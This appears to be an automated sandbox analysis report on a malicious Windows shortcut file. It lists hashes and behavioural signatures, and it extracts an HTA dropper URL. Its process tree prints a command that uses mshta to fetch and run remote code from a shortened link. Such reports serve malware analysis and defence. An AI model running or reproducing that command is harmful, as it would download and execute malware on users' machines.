Analysis
-
max time kernel
147s -
max time network
153s -
platform
windows10-2004_x64 -
resource
win10v2004-20240226-en -
resource tags
arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system -
submitted
10-04-2024 12:20
Static task
static1
Behavioral task
behavioral1
Sample
850751de7b8e158d86469d22ad1c3101.lnk
Resource
win7-20240221-en
windows7-x64
4 signatures
150 seconds
Behavioral task
behavioral2
Sample
850751de7b8e158d86469d22ad1c3101.lnk
Resource
win10v2004-20240226-en
windows10-2004-x64
4 signatures
150 seconds
General
-
Target
850751de7b8e158d86469d22ad1c3101.lnk
-
Size
1KB
-
MD5
850751de7b8e158d86469d22ad1c3101
-
SHA1
040eb591500caa4cbaa0c57b0059c30166c1e5c0
-
SHA256
e2eecaabb731f95b6b0250eb5e1b0324ad5844cdc43c1b8497a6972061abf775
-
SHA512
f3528062fdec7aa7fb6c4c790de2bcbd82145c0f850e5483f5c03ead339a74187db2d0198898ba334938b231c789d6f03a4645dc7ee4626db8eab68bdd4c10ba
Score
10/10
Malware Config
Extracted
Language
hta
Source
URLs
hta.dropper
https://bit.ly/38EZIGT
Signatures
-
Blocklisted process makes network request 2 IoCs
flow pid Process 8 624 mshta.exe 10 624 mshta.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000\Control Panel\International\Geo\Nation cmd.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious use of WriteProcessMemory 4 IoCs
description pid Process procid_target PID 1504 wrote to memory of 2616 1504 cmd.exe 86 PID 1504 wrote to memory of 2616 1504 cmd.exe 86 PID 2616 wrote to memory of 624 2616 cmd.exe 87 PID 2616 wrote to memory of 624 2616 cmd.exe 87
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\850751de7b8e158d86469d22ad1c3101.lnk1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1504 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c start /b C:\Windows\System32\mshta https://bit.ly/38EZIGT2⤵
- Suspicious use of WriteProcessMemory
PID:2616 -
C:\Windows\System32\mshta.exeC:\Windows\System32\mshta https://bit.ly/38EZIGT3⤵
- Blocklisted process makes network request
PID:624
-
-